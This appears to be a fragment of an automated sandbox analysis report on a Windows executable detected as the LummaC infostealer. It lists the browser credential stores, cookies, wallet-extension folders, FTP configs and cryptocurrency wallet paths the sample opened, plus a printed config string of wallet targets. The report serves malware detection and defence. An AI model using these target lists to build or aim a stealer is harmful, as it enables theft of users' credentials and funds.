Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA,

0_2_00F38208

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00E27CC0 GetTimeZoneInformation,

0_2_00E27CC0

Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.0000000000962000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.961414530.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.964745248.00000000009C0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: nyojpsdfkawed.exe PID: 7024, type: MEMORYSTR
Source: Yara match	File source: 0.2.nyojpsdfkawed.exe.d70000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: nyojpsdfkawed.exe, 00000000.00000002.1030496204.00000000009E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Lib
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: nyojpsdfkawed.exe, 00000000.00000003.936332961.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""]

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
